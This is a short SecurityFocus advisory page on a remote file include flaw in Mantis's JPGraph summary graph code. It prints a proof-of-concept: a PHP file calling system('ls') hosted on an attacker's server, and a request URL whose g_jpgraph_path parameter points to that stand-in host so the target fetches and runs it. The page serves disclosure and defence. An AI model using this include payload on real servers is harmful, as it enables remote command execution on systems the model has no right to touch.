Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Mantis JPGraph Remote File Include Command Execution Vulnerability

The following proof-of-concept was provided:

The attacker may create the following file (listings.txt) on a server they have access to:

<?php
system('ls');
exit;
?>

And then cause it to be included with the following request:

http://target/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F







 

Privacy Statement
Copyright 2008, SecurityFocus